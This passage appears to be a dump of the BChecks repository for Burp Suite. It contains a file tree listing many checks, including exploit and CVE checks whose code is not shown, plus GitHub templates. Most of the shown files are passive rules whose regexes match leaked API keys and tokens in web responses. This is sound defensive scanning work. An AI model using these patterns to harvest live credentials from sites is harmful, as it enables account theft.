├── .gitignore ├── BCheckChecker-1.9.jar ├── .github ├── pull_request_template.md ├── ISSUE_TEMPLATE │ ├── burp_bug_report.md │ ├── feature_request.md │ └── template_bug_report.md └── workflows │ ├── pr_bcheck_checker.yml │ ├── issue_webhook.yml │ └── pr_webhook.yml ├── other ├── tokens │ ├── nuget-api-key.bcheck │ ├── google-api-key.bcheck │ ├── openai-api-key.bcheck │ ├── slack-user-token.bcheck │ ├── crates-api-key.bcheck │ ├── github-app.bcheck │ ├── sauce-token.bcheck │ ├── mailchimp-api-key.bcheck │ ├── slack-bot-token.bcheck │ ├── mailgun-api-token.bcheck │ ├── picatic-api-key.bcheck │ ├── square-access.bcheck │ ├── dynatrace-api-token.bcheck │ ├── telegram-bot-token.bcheck │ ├── age-secret-key.bcheck │ ├── amazon-sns-topic.bcheck │ ├── bitly-secret-key.bcheck │ ├── facebook-access-token.bcheck │ ├── github-refresh.bcheck │ ├── mapbox-token-disclosure.bcheck │ ├── newrelic-admin-api-key.bcheck │ ├── pypi-upload-token.bcheck │ ├── segment-public-token.bcheck │ ├── sendgrid-api-key.bcheck │ ├── stripe-secret-key.bcheck │ ├── aws-api-key.bcheck │ ├── azure-apim-secretkey.bcheck │ ├── fcm-server-key.bcheck │ ├── google-client-id.bcheck │ ├── npm-access-token.bcheck │ ├── razorpay-clientid-disclosure.bcheck │ ├── shopify-app-secret.bcheck │ ├── age-public-key.bcheck │ ├── codeclimate-token.bcheck │ ├── discord-webhook.bcheck │ ├── github-oauth-access.bcheck │ ├── oauth-access-key.bcheck │ ├── rubygems-api-key.bcheck │ ├── shopify-customapp-token.bcheck │ ├── stackhawk-api.bcheck │ ├── github-personal-access.bcheck │ ├── google-oauth-prefixed.bcheck │ ├── gitlab-personal-token.bcheck │ ├── jdbc-connection-string.bcheck │ ├── loqate-api-key.bcheck │ ├── newrelic-rest-api-key.bcheck │ ├── shopify-legacy-token.bcheck │ ├── stripe-restricted-key.bcheck │ ├── twilio-api-key.bcheck │ ├── adobe-oauth-secret.bcheck │ ├── jwt-token.bcheck │ ├── newrelic-insights-key.bcheck │ ├── square-oauth-secret-token.bcheck │ ├── zenserp-api-key.bcheck │ ├── shopify-public-token.bcheck │ ├── shoppable-token.bcheck │ ├── heroku-api-key.bcheck │ ├── gitlab-pipeline-token.bcheck │ ├── google-calendar-link.bcheck │ ├── newrelic-synthetics-location-key.bcheck │ ├── cloudinary-credentials.bcheck │ ├── jenkins-crumb-token.bcheck │ ├── zapier-webhook-token.bcheck │ ├── axiom-digitalocean-key-exposure.bcheck │ ├── braintree-access-token.bcheck │ ├── newrelic-pixie-api-key.bcheck │ ├── newrelic-pixie-deploy-key.bcheck │ ├── gitlab-runner-token.bcheck │ ├── zoho-webhook-token.bcheck │ ├── aws-access-key-value.bcheck │ ├── aws-session-token.bcheck │ ├── microsoft-teams-webhook.bcheck │ ├── slack-webhook-token.bcheck │ ├── tugboat-config-exposure.bcheck │ ├── jwt-hmac-alg-detected.bcheck │ ├── aws-access-secret-key.bcheck │ └── cookie-cached-on-disk.bcheck ├── shiro │ ├── shiro_passive.bcheck │ └── shiro_active.bcheck ├── Netscaler_CitrixADC_hash_icon_detection.bcheck ├── takeover-s3-bucket.bcheck ├── technologies │ ├── Firebase-Detect.bcheck │ └── WoodWing-Detect.bcheck ├── recon │ ├── Check_OPTIONS.bcheck │ └── backend-language.bcheck ├── JavaScript │ ├── malicious_polyfill_cdn.bcheck │ ├── malicious_javascript_imported.bcheck │ └── jsMapFile.bcheck ├── prometheus │ ├── exposed-prometheus-metrics.bcheck │ ├── unauth-access-to-prometheus-server.bcheck │ ├── exposed-prometheus-api-endpoints.bcheck │ └── exposed-generic-prometheus-metrics.bcheck ├── apache-mod_info.bcheck ├── PHP Laravel Debug Mode enabled.bcheck ├── takeover-shopify.bcheck ├── files │ ├── configs │ │ ├── gitlab-ci-discovery.bcheck │ │ ├── git-config-discovery.bcheck │ │ ├── WordPress-ReadMe.bcheck │ │ └── web-config.discovery.bcheck │ ├── 000~ROOT~000-exposed.bcheck │ ├── npm-debug-log.bcheck │ ├── ruby-on-rails-storage.bcheck │ ├── Interesting-file-error-in-the-response.bcheck │ ├── ds-store-exposed.bcheck │ └── svn-exposed.bcheck ├── gcp.bcheck ├── Cookie-SameSite-Disabled.bcheck ├── missing-security-txt.bcheck ├── Apache Struts OGNL Console Publicly Accessible.bcheck ├── exposed-simple-saml-php-ui.bcheck ├── Blind-SSRF-By-Collaborator.bcheck ├── configs │ ├── apache-airflow-config-exposure.bcheck │ └── dockerrun-aws-config-page-exposure.bcheck ├── php-8.1.0-dev-backdoor.bcheck ├── IBM Websphere Source File Publicly Accessible.bcheck ├── ntlm-authentication-discovery.bcheck ├── fastjson │ ├── Fastjson-1.2.62-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.41-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.24-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.43-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.67-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.47-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.42-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.68-Deserialization-RCE.bcheck │ └── Fastjson-1.2.80-Deserialization-RCE.bcheck ├── go debug pprof exposed.bcheck ├── springboot │ ├── Springboot heapdump actuator.bcheck │ ├── Springboot logfile actuator.bcheck │ ├── Springboot metrics actuator.bcheck │ ├── Springboot caches actuator.bcheck │ ├── Springboot info actuator.bcheck │ ├── Springboot health actuator.bcheck │ ├── Springboot loggers actuator.bcheck │ ├── Springboot conditions actuator.bcheck │ ├── Springboot scheduledtasks actuator.bcheck │ ├── Springboot threaddump actuator.bcheck │ ├── Springboot env actuator.bcheck │ ├── Springboot beans actuator.bcheck │ ├── Springboot trace actuator.bcheck │ ├── Springboot autoconfig actuator.bcheck │ └── Springboot configprops actuator.bcheck ├── SAP Directory Listing.bcheck ├── MsExchange-ECP-Admin-Accessible.bcheck ├── xxl-job │ └── xxl_job_rce.bcheck ├── APIs │ └── couchbase-unauth-apis.bcheck ├── nacos │ ├── Nacos-default-password.bcheck │ └── Nacos-severidentity-bypass.bcheck ├── SAP │ └── SAP authentication bypass check.bcheck ├── symfony-verbose-debug-mode.bcheck ├── Etcd Server - Unauthenticated Access.bcheck ├── WebBackup Exposed.bcheck ├── Kubernetes_Pods_API_Discovery_&_Remote_Code_Execution.bcheck ├── GraphQL │ └── grapple-get-method.bcheck ├── Cache Deception check (Path confusion).bcheck ├── corsCredentialedRequestsMisconfiguration.bcheck ├── Cloudflare External Image Resizing Misconfiguration.bcheck ├── Rails CRLF and XSS.bcheck ├── exposed-laravel-clockwork.bcheck ├── OAuth │ └── OpenID-Dynamic-Client-Registration-Endpoint-Detected.bcheck ├── exposed-laravel-telescope.bcheck ├── bypass │ ├── waf-bypass.bcheck │ └── 403-429-bypass.bcheck ├── csrf_magic_backdoor.bcheck ├── sentinel │ └── Alibaba-Sentinel-SSRF.bcheck └── Apache Tomcat Manager Path Normalization Panel.bcheck ├── examples ├── leaked-aws-token.bcheck ├── blind-ssrf.bcheck ├── exposed-git-directory.bcheck ├── README.md ├── suspicious-input-transformation.bcheck └── exposed-backup-file.bcheck ├── vulnerability-classes └── injection │ ├── CRLFInjection.bcheck │ ├── SSRFInjection.bcheck │ ├── Spring4Shell.bcheck │ ├── SSTI-Razor.bcheck │ └── ExtendedSSRFInjection.bcheck └── vulnerabilities-CVEd ├── CVE-2018-11759-Apache mod_jk access control bypass.bcheck ├── CVE-2022-22978-spring_security_auth_bypass.bcheck ├── CVE-2001-0537 CISCO Authentication Bypass.bcheck ├── CVE-2022-22963-spring_cloud_function_rce.bcheck ├── CVE-2021-20323 keycloak xss.bcheck ├── CVE-2025-29927-Next-js-middleware-bypass.bcheck ├── CVE-2020-5902 F5 Networks Authentication Bypass.bcheck ├── CVE-2018-1273-spring_data_commons_rce.bcheck ├── CVE-2023-35078 Ivanti EPMM Unauthenticate Access.bcheck ├── CVE-2020-1957-shiro_auth_bypass.bcheck ├── CVE-2022-22965-spring_data_binding_rce.bcheck ├── CVE-2017-8046-spring_data_rest_rce.bcheck ├── CVE-2023-37265 - CasaOS - Auth Bypass due to a lack of IP address verification.bcheck ├── CVE-2019-17662 - ThinVNC 10b1 - Auth Bypass.bcheck ├── CVE-2023-29298 Adobe ColdFusion Access Control Bypass.bcheck ├── CVE-2020-35713 - Belkin Linksys RE6500 10012001 - RCE.bcheck ├── CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck ├── CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck ├── CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck ├── CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck ├── CVE-2023-46805-Ivanti Auth Bypass.bcheck ├── CVE-2018-20824 - Atlassian Jira WallboardServlet Cross Site Scripting.bcheck ├── CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck ├── CVE-2017-4971-spring_webflow_rce.bcheck ├── CVE-2023-38035 - Ivanti Sentry - Auth Bypass.bcheck ├── CVE-2023-5244-Microweber less than V.2.0-Cross-Site-Scripting.bcheck ├── CVE-2023-23752-Joomla-information-disclosure.bcheck ├── CVE-2025-5777 - CitrixBleed 2.bcheck ├── CVE-2023-36845 Juniper Networks - PHP External Variable Modification.bcheck ├── CVE-2023-26360 Adobe ColdFusion Arbitrary File Read and Code Execution.bcheck ├── CVE-2018-1000129 - Jolokia 137 - Cross-Site Scripting.bcheck ├── CVE-2023-24488 - Citrix Gateway Open Redirect and XSS.bcheck ├── CVE-2022-0140.bcheck ├── CVE-2020-10770 Keycloak request_uri SSRF.bcheck └── CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .vscode 3 | .idea 4 | -------------------------------------------------------------------------------- /BCheckChecker-1.9.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PortSwigger/BChecks/main/BCheckChecker-1.9.jar -------------------------------------------------------------------------------- /.github/pull_request_template.md: -------------------------------------------------------------------------------- 1 | ### BCheck Contributions 2 | 3 | * [ ] BCheck compiles and executes as expected 4 | * [ ] BCheck contains appropriate metadata (name, version, author, description and appropriate tags) 5 | * [ ] Only .bcheck files have been added or modified 6 | * [ ] BCheck is in the appropriate folder 7 | * [ ] PR contains single or limited number of BChecks (Multiple PRs are preferred) 8 | * [ ] BCheck attempts to minimize false positives 9 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/burp_bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a bug report to help us improve BChecks within Burp Suite 4 | title: "[BUG]" 5 | labels: bug 6 | assignees: '' 7 | 8 | --- 9 | 10 | ### Current behavior 11 | 12 | 13 | 14 | ### Expected behavior 15 | 16 | 17 | 18 | ### Environment details 19 | 20 | - Burp version: 21 | - BCheck language version: 22 | - Operating system: 23 | 24 | 25 | ### Additional details 26 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an enhancement for BChecks 4 | title: "[FEATURE]" 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | ### What is the problem you are trying to solve? 11 | 12 | 13 | 14 | ### How are you currently being hindered by this problem? 15 | 16 | 17 | 18 | ### How would you like this problem to be solved? 19 | 20 | 21 | 22 | ### Any additional details? 23 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/template_bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: BCheck template bug 3 | about: Create a bug report to report an issue with a specific BCheck 4 | title: "[BUG]" 5 | labels: bug, template 6 | assignees: '' 7 | 8 | --- 9 | 10 | ### Path of script within repository 11 | 12 | 13 | 14 | ### Current behavior 15 | 16 | 17 | 18 | ### Expected behavior 19 | 20 | 21 | 22 | ### Environment details 23 | 24 | - Burp version: 25 | - BCheck language version: 26 | - Operating system: 27 | 28 | 29 | ### Additional details 30 | -------------------------------------------------------------------------------- /other/tokens/nuget-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NuGet API Key" 4 | description: "Looks for NuGet API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "nuget", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "oy2[a-z0-9]{43}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "NuGet API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /examples/leaked-aws-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Response-level (passive)" 4 | description: "Looks in responses to see if there are leaked AWS Access Key IDs" 5 | author: "Carlos Montoya" 6 | tags: "passive" 7 | 8 | given response then 9 | if {latest.response} matches "AKIA[0-9A-Z]{16}" then 10 | report issue: 11 | severity: high 12 | confidence: firm 13 | detail: "Leaked AWS Access Key ID." 14 | remediation: "Replace your keys and ensure keys are no longer revealed." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/google-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google API Key" 4 | description: "Looks for Google API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "AIza[0-9A-Za-z\-_]{35}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/openai-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "OpenAI API Key" 4 | description: "Looks for OpenAI API key exposure." 5 | author: "@puzzlepeaches" 6 | tags: "openai", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "sk-[a-zA-Z0-9]{48}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "OpenAI API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/slack-user-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Slack User token disclosure" 4 | description: "Looks for Slack User token in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "slack" 7 | 8 | given response then 9 | if {latest.response} matches "xoxp-[0-9A-Za-z\-]{72}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Slack User token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/shiro/shiro_passive.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shiro Cookie Check Passive" 4 | description: "Check for Shiro Vulnerability in Response" 5 | author: "timeshatter" 6 | tags: "Shiro,passive" 7 | 8 | given response then 9 | if "rememberMe=deleteMe" in {latest.response} then 10 | report issue: 11 | severity: info 12 | confidence: certain 13 | detail: "Shiro Vulnerability Detected: rememberMe=deleteMe" 14 | remediation: "Investigate and fix the Shiro vulnerability immediately." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/crates-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Crates.io API Key" 4 | description: "Looks for API keys for Crates.io in page source." 5 | author: "@puzzlepeaches" 6 | tags: "crates", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\bcio[a-zA-Z0-9]{32}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Crates.io API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/github-app.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Github App Token" 4 | description: "Looks for Github App Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "github", "app", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Github App Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/sauce-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Sauce Token" 4 | description: "Searches for Sauce Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "sauce", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)sauce.{0,50}\b([a-f0-9-]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Sauce Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/Netscaler_CitrixADC_hash_icon_detection.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Netscaler/CitrixADC Icon Hash" 4 | description: "Detects the hash of Netscaler and Citrix ADC" 5 | tags: "passive" 6 | author: "Randsec" 7 | 8 | given response then 9 | if "/vpn/images/AccessGateway.ico" in {latest.response.body} or "receiver/images/common/icon_vpn.ico" in {latest.response.body} then 10 | report issue: 11 | severity: info 12 | confidence: firm 13 | detail: "Possible Netscaler / Citrix ADC detected" 14 | end if 15 | -------------------------------------------------------------------------------- /other/tokens/mailchimp-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Mailchimp API Value" 4 | description: "Looks for Mailchimp API values in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "mailchimp" 7 | 8 | given response then 9 | if {latest.response} matches "[0-9a-f]{32}-us[0-9]{1,2}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Mailchimp API value found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/slack-bot-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Slack Access Token" 4 | description: "Looks for slack access token in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "slack" 7 | 8 | given response then 9 | if {latest.response} matches "xoxb-[0-9A-Za-z\-]{51}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Slack access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/mailgun-api-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Mailgun API Key" 4 | description: "Looks for Mailgun API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "mailgun", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)(?:mailgun|mg).{0,20}key-([a-z0-9]{32})\\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Mailgun API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/picatic-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Picatic API Key Disclosure" 4 | description: "Looks for Picatic API key disclosures in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "sk_live_[0-9a-z]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Picatic API Key has been disclosed." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/square-access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Square Access Token" 4 | description: "Looks for Square access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "square", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b(sq0atp-[a-z0-9_-]{22})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Square Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/dynatrace-api-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Dynatrace API Token" 4 | description: "Looks for Dynatrace API tokens." 5 | author: "@puzzlepeaches" 6 | tags: "dynatrace", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(dt0[a-zA-Z]{1}[0-9]{2}\.[A-Z0-9]{24}\.[A-Z0-9]{64})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Dynatrace API Token found." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/telegram-bot-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Telegram Bot Token" 4 | description: "Looks for Telegram Bot Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "telegram", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(\d+:AA[a-zA-Z0-9_-]{32,33})" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Telegram Bot Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/age-secret-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Age Identity Key in Source Code" 4 | description: "Looks for Age identity keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "age-encryption", "exposure", "tokens" 7 | 8 | given response then 9 | if {latest.response} matches "\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Age identity key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/amazon-sns-topic.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Amazon SNS Topic Disclosure" 4 | description: "Discloses Amazon SNS Topics." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "amazon" 7 | 8 | given response then 9 | if {latest.response} matches "arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Amazon SNS topic disclosed in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/bitly-secret-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Bitly Secret Key Disclosure" 4 | description: "Looks for Bitly secret keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "bitly" 7 | 8 | given response then 9 | if {latest.response} matches "R_[0-9a-f]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Bitly Secret Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/facebook-access-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Facebook Access Token" 4 | description: "Looks for Facebook access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "facebook", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Facebook access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/github-refresh.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitHub Refresh Token" 4 | description: "Checks for GitHub refresh tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "github", "refresh", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(ghr_[a-zA-Z0-9]{76})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitHub refresh token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/mapbox-token-disclosure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Mapbox Token Disclosure" 4 | description: "Looks for Mapbox tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "token", "exposure", "mapbox", "disclosure" 7 | 8 | given response then 9 | if {latest.response} matches "sk\.eyJ1Ijoi\w+\.[\w-]*" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "Mapbox token found in page source." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-admin-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NewRelic Admin API Key Disclosure" 4 | description: "Looks for NewRelic Admin API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRAA-[a-f0-9]{27}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "NewRelic Admin API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/pypi-upload-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "PyPI Upload Token" 4 | description: "Searches for PyPI upload tokens in website content." 5 | author: "@puzzlepeaches" 6 | tags: "pypi", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "PyPI Upload Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/segment-public-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Segment Public API Token" 4 | description: "Looks for Segment's API tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "segment", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "sgp_[a-zA-Z0-9]{64}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Segment Public API Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/sendgrid-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Sendgrid API Key Disclosure" 4 | description: "Looks for exposed Sendgrid API keys." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "sendgrid" 7 | 8 | given response then 9 | if {latest.response} matches "SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Sendgrid API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/stripe-secret-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Stripe Secret Key Disclosure" 4 | description: "Detects exposure of Stripe Secret Keys." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "stripe" 7 | 8 | given response then 9 | if {latest.response} matches "sk_(?:live|test)_[0-9a-zA-Z]{24}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Stripe Secret Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/takeover-s3-bucket.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS S3 Bucket takeover" 4 | description: "Possible sub-domain takeover via AWS S3 bucket." 5 | tags: "passive,s3,takeover,cloud" 6 | author: "Milad Fadavvi" 7 | 8 | 9 | given response then 10 | if "NoSuchBucket" in {latest.response} and "BucketName:" in {latest.response} then 11 | report issue: 12 | severity: high 13 | confidence: firm 14 | detail: "https://github.com/EdOverflow/can-i-take-over-xyz/issues/36" 15 | remediation: "Delete the related DNS record." 16 | end if 17 | -------------------------------------------------------------------------------- /other/tokens/aws-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS API Key" 4 | description: "Looks for AWS API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "aws", "amazon", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "AWS API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/azure-apim-secretkey.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: 